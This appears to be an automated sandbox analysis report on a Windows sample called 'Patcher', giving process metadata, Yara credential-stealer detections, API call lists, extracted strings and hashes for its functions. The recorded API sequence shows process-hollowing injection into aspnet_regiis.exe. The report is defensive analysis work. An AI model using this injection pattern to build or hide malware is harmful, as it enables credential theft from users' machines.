Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:41:53
Start date:	05/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x360000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1714086853.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1714011851.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1714130661.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	1.8%
Signature Coverage:	7%
Total number of Nodes:	995
Total number of Limit Nodes:	18

Executed Functions

Function 6CDE3780 Relevance: 68.1, APIs: 23, Strings: 14, Instructions: 3308nativethreadmemoryCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 6CDE4589
ShowWindow.USER32 ref: 6CDE459F
VirtualAlloc.KERNELBASE ref: 6CDE47DA
CreateProcessW.KERNELBASE ref: 6CDE4ACF
NtGetContextThread.NTDLL ref: 6CDE4C59
NtAllocateVirtualMemory.NTDLL ref: 6CDE4D5C
NtAllocateVirtualMemory.NTDLL ref: 6CDE4DC4
NtWriteVirtualMemory.NTDLL ref: 6CDE5127
NtWriteVirtualMemory.NTDLL ref: 6CDE5460
NtReadVirtualMemory.NTDLL ref: 6CDE5DC0
NtWriteVirtualMemory.NTDLL ref: 6CDE5F8B
NtWriteVirtualMemory.NTDLL ref: 6CDE61BD
NtCreateThreadEx.NTDLL ref: 6CDE65D6
NtSetContextThread.NTDLL ref: 6CDE66B1
NtResumeThread.NTDLL ref: 6CDE66C9
CloseHandle.KERNEL32 ref: 6CDE6746
CloseHandle.KERNEL32 ref: 6CDE6764
NtWriteVirtualMemory.NTDLL ref: 6CDE6A98
NtReadVirtualMemory.NTDLL ref: 6CDE6C13
NtSetContextThread.NTDLL ref: 6CDE6D10
NtResumeThread.NTDLL ref: 6CDE6D28

Strings

MZx, xrefs: 6CDE45CD, 6CDE45E9
%B5, xrefs: 6CDE5B57
Y, xrefs: 6CDE5660
\m", xrefs: 6CDE5358
D, xrefs: 6CDE4843
n"j\, xrefs: 6CDE4983
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 6CDE488B
kernel32.dll, xrefs: 6CDE45A5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, xrefs: 6CDE4901, 6CDE6933
d?, xrefs: 6CDE461E
+?/r, xrefs: 6CDE53D7
ntdll.dll, xrefs: 6CDE45B9
@, xrefs: 6CDE4DBC
+?/r, xrefs: 6CDE5524

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: Virtual$Memory$Thread$Write$Context$AllocateCloseCreateHandleReadResumeWindow$AllocConsoleProcessShow
String ID: %B5$+?/r$+?/r$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$MZx$Y$\m"$d?$kernel32.dll$n"j\$ntdll.dll
API String ID: 975583523-2967235075
Opcode ID: 47a09a3cd08df5ac66439b56183c25312d67cfdb10b563723df9a24fd7e10a5f
Instruction ID: be9d9d61792bae2162199f59ba559fff5352fc7b61ad3057a864b335186634d4
Opcode Fuzzy Hash: 47a09a3cd08df5ac66439b56183c25312d67cfdb10b563723df9a24fd7e10a5f
Instruction Fuzzy Hash: 53530E71A44229CFCB18CF2CC8857DDBBF1AB4A314F108199E459DBBA4DA359E86CF41

Function 6CDE11F0 Relevance: 38.2, APIs: 17, Strings: 4, Instructions: 1417filememoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?), ref: 6CDE1804
GetModuleHandleA.KERNEL32 ref: 6CDE1842
CreateFileA.KERNELBASE ref: 6CDE1999
CreateFileMappingA.KERNEL32 ref: 6CDE1B5E
CloseHandle.KERNEL32 ref: 6CDE1DBF
VirtualProtect.KERNELBASE ref: 6CDE221B
CloseHandle.KERNELBASE ref: 6CDE24BA
CloseHandle.KERNEL32 ref: 6CDE26AE
MapViewOfFile.KERNEL32 ref: 6CDE26F0
VirtualProtect.KERNEL32 ref: 6CDE2770

Strings

.text, xrefs: 6CDE2134
`+`, xrefs: 6CDE1E00
a`R, xrefs: 6CDE1218
@, xrefs: 6CDE2764

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: Handle$CloseFile$CreateProtectVirtual$CurrentMappingModuleProcessView
String ID: .text$@$`+`$a`R
API String ID: 883456831-4115282151
Opcode ID: a6f5c63b3a303f09d1ce6b582edaf3993c917ceb0cecb0383bbe1559d956e749
Instruction ID: b07bb11d025702e96e99a437466aff1273b15795e3f45f3c355edd282fa9de34
Opcode Fuzzy Hash: a6f5c63b3a303f09d1ce6b582edaf3993c917ceb0cecb0383bbe1559d956e749
Instruction Fuzzy Hash: 9EC2FA75A04201CFDB04DF7CC999BCE7BF2AB4A318F108298E859DB7A6C6359D498F11

Function 6CDE3170 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 286
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 6CDE318E

Strings

ntdll.dll, xrefs: 6CDE3185
NtQueryInformationProcess, xrefs: 6CDE3199

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: HandleModule
String ID: NtQueryInformationProcess$ntdll.dll
API String ID: 4139908857-2906145389
Opcode ID: 819b0187cb706ff087bbfd401eb1c3f46c40dc74025d977df69ea9f2d5c94f18
Instruction ID: d7cc1693933cedca8033ced144f2be0f3068666f3b6f874d86537ac6be0a57f2
Opcode Fuzzy Hash: 819b0187cb706ff087bbfd401eb1c3f46c40dc74025d977df69ea9f2d5c94f18
Instruction Fuzzy Hash: 1BA18E71E45209DFCB04CFACC5943EE7BF1AB4A314F20852DD8A5ABBB0D6359946CB41

Function 026909EA Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1657228201.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2690000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 379355172f82dd58b3e4663ac23b4e88abb41483f89f033ef5db908875799356
Instruction ID: 237d024bf5c7020773a89cdaec6c618f2d653589e85e15806d00128d144071b7
Opcode Fuzzy Hash: 379355172f82dd58b3e4663ac23b4e88abb41483f89f033ef5db908875799356
Instruction Fuzzy Hash: 6351D574E002089FCB08DFA9D494AEDBBF6FF89314F14846AD415AB364DB359946CF50

Function 6CDE7268 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CDE72AF
___scrt_uninitialize_crt.LIBCMT ref: 6CDE72C9

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: da4e1336b6ef2fa925d3fd9104587a1fa3d2dc1417484ca17c1baa34fc70f73c
Instruction ID: 347da95274e1336cd2f2cf3add80278ff1d6cb46820e082cbdd6d40493fc1b37
Opcode Fuzzy Hash: da4e1336b6ef2fa925d3fd9104587a1fa3d2dc1417484ca17c1baa34fc70f73c
Instruction Fuzzy Hash: 0A413632E04619FBDBA19F55CC40B9F3AB5EB8975CF124019E82467B71D7304D468BB0

Function 6CDE7318 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6CDE7355
dllmain_crt_dispatch.LIBCMT ref: 6CDE736C
dllmain_raw.LIBCMT ref: 6CDE73B4
dllmain_crt_dispatch.LIBCMT ref: 6CDE73C7
dllmain_raw.LIBCMT ref: 6CDE73DA

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: f949818c5f40ca645772ffbab04ae2211a27eddaadaddc347a1f1935e376fda0
Instruction ID: 27f3960d0531e9c5afb78b97acf3ee8a9c45d329fbc57a4457ad5e85d2acec19
Opcode Fuzzy Hash: f949818c5f40ca645772ffbab04ae2211a27eddaadaddc347a1f1935e376fda0
Instruction Fuzzy Hash: 9821A371E05619FBDBA28F55CC40AAF3E79EB89B98F124119FC2457A71D3308D428BE0

Function 6CDED1BF Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6CDED1C7

Part of subcall function 6CDED11C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CDEF180,?,00000000,-00000008), ref: 6CDED17D

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CDED1FF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CDED21F

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: dd6ce470440abf671c90b823aa8929ccadb5722306fec42e5f1d7d74a3398a98
Instruction ID: d641c2e85f0d4363028cca2d723b739297ca99f3d9236ef5e50625c2a5c517a1
Opcode Fuzzy Hash: dd6ce470440abf671c90b823aa8929ccadb5722306fec42e5f1d7d74a3398a98
Instruction Fuzzy Hash: 4211C0F1605615BEAB0117769CC9CAF7E6CEFDE69C3190526FA0192620EF20DD0585B2

Function 6CDE7161 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CDE71AE

Part of subcall function 6CDE762B: InitializeSListHead.KERNEL32(6CE49FF0,6CDE71B8,6CDF83E0,00000010,6CDE7149,?,?,?,6CDE7371,?,00000001,?,?,00000001,?,6CDF8428), ref: 6CDE7630

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CDE7218

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 43f8947c666ad7c51a99fe3f37287a4b2ba2ced55bc392d0a67961879aacb0c9
Instruction ID: 4102cd29438670feff9756b14a67fddb93a6c08b126bd72252829222576d4ce7
Opcode Fuzzy Hash: 43f8947c666ad7c51a99fe3f37287a4b2ba2ced55bc392d0a67961879aacb0c9
Instruction Fuzzy Hash: 2121D131648301B9EB906BB498007CA3771AF0E22DF23441AE4986BFB3DF21004EC672

Function 6CDED7BC Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6CDED808
GetFileType.KERNELBASE(00000000), ref: 6CDED81A

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 60888a1d9607a1f92599351d07068d51232f601027b6e82bcb7868b0d65e73ca
Instruction ID: 36975dbd94c8ba7f824476a31f5de9f59475abbec98243dca2f539de752b502c
Opcode Fuzzy Hash: 60888a1d9607a1f92599351d07068d51232f601027b6e82bcb7868b0d65e73ca
Instruction Fuzzy Hash: FC1193726047518AD7315F3E8CC8616FAA9ABCF238B34075ED5B6869F1CB30D486C241

Function 02690FE0 Relevance: 1.6, APIs: 1, Instructions: 86
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(?), ref: 02691081

Memory Dump Source

Source File: 00000000.00000002.1657228201.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2690000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a34bf6bc4ee335802cae9bfec0ea45f84449422b9271d88f31e7ab436a6328f9
Instruction ID: a89fa36f415fedb33b74497a03f126a5839143d10fd1df9c00647a2885c3859a
Opcode Fuzzy Hash: a34bf6bc4ee335802cae9bfec0ea45f84449422b9271d88f31e7ab436a6328f9
Instruction Fuzzy Hash: 0431CAB4D012989FCB14CFA9D984AEEFBF1AB49310F24806AE448B7321D735A946CF54

Function 02690FE8 Relevance: 1.6, APIs: 1, Instructions: 81
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(?), ref: 02691081

Memory Dump Source

Source File: 00000000.00000002.1657228201.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2690000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e5937b0acb3c99067ca3a7fdba469a27d06f57974319faf63670d31d301b94f1
Instruction ID: da04110a75cbcceef7a8fe6de54c30340b96d8a49d683bac0a839b9f0933f5b5
Opcode Fuzzy Hash: e5937b0acb3c99067ca3a7fdba469a27d06f57974319faf63670d31d301b94f1
Instruction Fuzzy Hash: D431A7B4D01259DFCB10CFA9D984A9EFBF5BB49314F24806AE808B7320D735A945CFA4

Function 6CDEE17A Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,6CDECAC7,6CDEDE94,?,6CDECAC7,00000220,?,?,6CDEDE94), ref: 6CDEE1AC

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: aaf7c305c55b4e17bef79db32df33813f43f03d5f52217d052decf89a150a0d3
Instruction ID: 9a9f7a8f8068ca6ad3a36dc024c057119de14294b7c0278d14a61ddf36f86aa2
Opcode Fuzzy Hash: aaf7c305c55b4e17bef79db32df33813f43f03d5f52217d052decf89a150a0d3
Instruction Fuzzy Hash: 92E0E531281A51E6FB10276A9C00B9A375C9B4E6A9F114122DC1496DF0CB20C48081F5

Function 02691478 Relevance: 1.3, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?), ref: 026914FD

Memory Dump Source

Source File: 00000000.00000002.1657228201.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2690000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 60cddd63c6637cc7ea22c5eb1e3c0237147553ea23953722315fe50add7c8de2
Instruction ID: 54d348e9592cba1755945bb8e3abc715ded192687070d1e5b761dcea6ffbe533
Opcode Fuzzy Hash: 60cddd63c6637cc7ea22c5eb1e3c0237147553ea23953722315fe50add7c8de2
Instruction Fuzzy Hash: 5331D9B4D012589FCF10CFA9D584AEEFBB4AB09320F24846AE819B7311C734A941CF68

Function 02691480 Relevance: 1.3, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?), ref: 026914FD

Memory Dump Source

Source File: 00000000.00000002.1657228201.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2690000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e7c9181390cace0a0f7e15653655ab3994417592caa975b647a1d5e6ac4b98de
Instruction ID: 4d705e333c4dacb63a00045dcca928b1185689641d9b222eb3c2196d0dd8d0ca
Opcode Fuzzy Hash: e7c9181390cace0a0f7e15653655ab3994417592caa975b647a1d5e6ac4b98de
Instruction Fuzzy Hash: 2031A9B5D012589FCF10CFA9D584AEEFBF4AB09310F24946AE819B7350D774A941CF68

Non-executed Functions

Function 6CE1D029 Relevance: 141.7, Strings: 113, Instructions: 403COMMON

Download Yara Rule

Strings

J, xrefs: 6CE1D0E4
j, xrefs: 6CE1D710
9, xrefs: 6CE1D579
N, xrefs: 6CE1D154
R, xrefs: 6CE1D203
o, xrefs: 6CE1D4D1
N, xrefs: 6CE1D525
I, xrefs: 6CE1D19A
c, xrefs: 6CE1D074
R, xrefs: 6CE1D0BA
w, xrefs: 6CE1D651
5, xrefs: 6CE1D336
J, xrefs: 6CE1D17E
t, xrefs: 6CE1D328
!, xrefs: 6CE1D305
_, xrefs: 6CE1D5FD
w, xrefs: 6CE1D193
W, xrefs: 6CE1D5DD
[, xrefs: 6CE1D1F5
N, xrefs: 6CE1D31A
z, xrefs: 6CE1D131
R, xrefs: 6CE1D1BD
U, xrefs: 6CE1D72C
2, xrefs: 6CE1D541
V, xrefs: 6CE1D720
I, xrefs: 6CE1D33D
3, xrefs: 6CE1D32F
l, xrefs: 6CE1D1A1
., xrefs: 6CE1D499
~, xrefs: 6CE1D0CF
c, xrefs: 6CE1D681
a, xrefs: 6CE1D082
S, xrefs: 6CE1D1AF
~, xrefs: 6CE1D0DD
k, xrefs: 6CE1D0A5
u, xrefs: 6CE1D649
;, xrefs: 6CE1D146
@, xrefs: 6CE1D185
D, xrefs: 6CE1D100
", xrefs: 6CE1D605
{, xrefs: 6CE1D0F2
j, xrefs: 6CE1D107
O, xrefs: 6CE1D313
y, xrefs: 6CE1D619
}, xrefs: 6CE1D629
, xrefs: 6CE1D4B5
F, xrefs: 6CE1D10E
Z, xrefs: 6CE1D066
Y, xrefs: 6CE1D47D
o, xrefs: 6CE1D09E
b, xrefs: 6CE1D20A
S, xrefs: 6CE1D1D9
T, xrefs: 6CE1D728
{, xrefs: 6CE1D621
p, xrefs: 6CE1D177
V, xrefs: 6CE1D2F7
X, xrefs: 6CE1D1B6
E, xrefs: 6CE1D138
z, xrefs: 6CE1D0C1
q, xrefs: 6CE1D639
5, xrefs: 6CE1D18C
?, xrefs: 6CE1D4ED
S, xrefs: 6CE1D2FE
G, xrefs: 6CE1D115
|, xrefs: 6CE1D274
T, xrefs: 6CE1D0AC
T, xrefs: 6CE1D1E0
m, xrefs: 6CE1D669
a, xrefs: 6CE1D679
R, xrefs: 6CE1D058
W, xrefs: 6CE1D089
h, xrefs: 6CE1D718
R, xrefs: 6CE1D1E7
g, xrefs: 6CE1D07B
4, xrefs: 6CE1D54F
k, xrefs: 6CE1D661
R, xrefs: 6CE1D0B3
Z, xrefs: 6CE1D288
8, xrefs: 6CE1D4FB
o, xrefs: 6CE1D344
o, xrefs: 6CE1D671
f, xrefs: 6CE1D517
>, xrefs: 6CE1D15B
g, xrefs: 6CE1D691
I, xrefs: 6CE1D5CD
i, xrefs: 6CE1D659
$, xrefs: 6CE1D4C3
=, xrefs: 6CE1D587
W, xrefs: 6CE1D1FC
E, xrefs: 6CE1D14D
g, xrefs: 6CE1D30C
m, xrefs: 6CE1D05F
f, xrefs: 6CE1D68D
2, xrefs: 6CE1D321
K, xrefs: 6CE1D0EB
s, xrefs: 6CE1D641
5, xrefs: 6CE1D051
R, xrefs: 6CE1D730
n, xrefs: 6CE1D06D
p, xrefs: 6CE1D11C
>, xrefs: 6CE1D70C
Z, xrefs: 6CE1D1CB
&, xrefs: 6CE1D48B
J, xrefs: 6CE1D0D6
/, xrefs: 6CE1D1D2
S, xrefs: 6CE1D1EE
r, xrefs: 6CE1D123
:, xrefs: 6CE1D55D
), xrefs: 6CE1D1A8
*, xrefs: 6CE1D1C4
\, xrefs: 6CE1D090
e, xrefs: 6CE1D689
F, xrefs: 6CE1D12A

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: $!$"$$$&$)$*$.$/$2$2$3$4$5$5$5$8$9$:$;$=$>$>$?$@$D$E$E$F$F$G$I$I$I$J$J$J$K$N$N$N$O$R$R$R$R$R$R$R$S$S$S$S$T$T$T$U$V$V$W$W$W$X$Y$Z$Z$Z$[$\$_$a$a$b$c$c$e$f$f$g$g$g$h$i$j$j$k$k$l$m$m$n$o$o$o$o$p$p$q$r$s$t$u$w$w$y$z$z${${$|$}$~$~
API String ID: 0-241169252
Opcode ID: b1772888452ce45cd48f2e906bf0788cb5cd5b9da86efbade8088f0bfc53c861
Instruction ID: 9533dec62139fdc957aafeaef7866b2912cb93b84fa38a65a383029b39bce422
Opcode Fuzzy Hash: b1772888452ce45cd48f2e906bf0788cb5cd5b9da86efbade8088f0bfc53c861
Instruction Fuzzy Hash: 0C32011090C7E9C9EB22867C9C587DDBEA11B23318F1842DDD0DD6B7D3D6B90A85CB62

Function 6CE17170 Relevance: 122.6, Strings: 97, Instructions: 1393COMMON

Download Yara Rule

Strings

Q, xrefs: 6CE17E13
}, xrefs: 6CE17E2B
z, xrefs: 6CE17678
", xrefs: 6CE17719
z, xrefs: 6CE17624
D, xrefs: 6CE1767F
q, xrefs: 6CE177EB
`, xrefs: 6CE176CC
', xrefs: 6CE1764E
{, xrefs: 6CE17885
#, xrefs: 6CE1768D
], xrefs: 6CE176E1
r, xrefs: 6CE1765C
R, xrefs: 6CE1757C
{, xrefs: 6CE1762B
^, xrefs: 6CE177CF
1, xrefs: 6CE17838
i, xrefs: 6CE17632
P, xrefs: 6CE176C5
Z, xrefs: 6CE17598
^, xrefs: 6CE177C8
8, xrefs: 6CE177E4
{, xrefs: 6CE1769B
Z, xrefs: 6CE17704
*, xrefs: 6CE174CF
_, xrefs: 6CE176D3
{, xrefs: 6CE176B7
O, xrefs: 6CE17E23
V, xrefs: 6CE17E0B
=, xrefs: 6CE17800
L, xrefs: 6CE176BE
M, xrefs: 6CE1770B
q, xrefs: 6CE176FD
d, xrefs: 6CE1759F
w, xrefs: 6CE1772E
t, xrefs: 6CE17591
0, xrefs: 6CE1776D
Q, xrefs: 6CE17E17
F, xrefs: 6CE1766A
M, xrefs: 6CE176A9
{, xrefs: 6CE1760F
T, xrefs: 6CE17671
y, xrefs: 6CE182AC
d, xrefs: 6CE175A6
;, xrefs: 6CE177DD
A, xrefs: 6CE17E1B
`, xrefs: 6CE175F3
T, xrefs: 6CE17869
{, xrefs: 6CE17789
h, xrefs: 6CE177BA
D, xrefs: 6CE17686
^, xrefs: 6CE1787E
', xrefs: 6CE177B3
{, xrefs: 6CE17639
R, xrefs: 6CE176DA
D, xrefs: 6CE176EF
b, xrefs: 6CE174BA
0, xrefs: 6CE175AD
i, xrefs: 6CE1775F
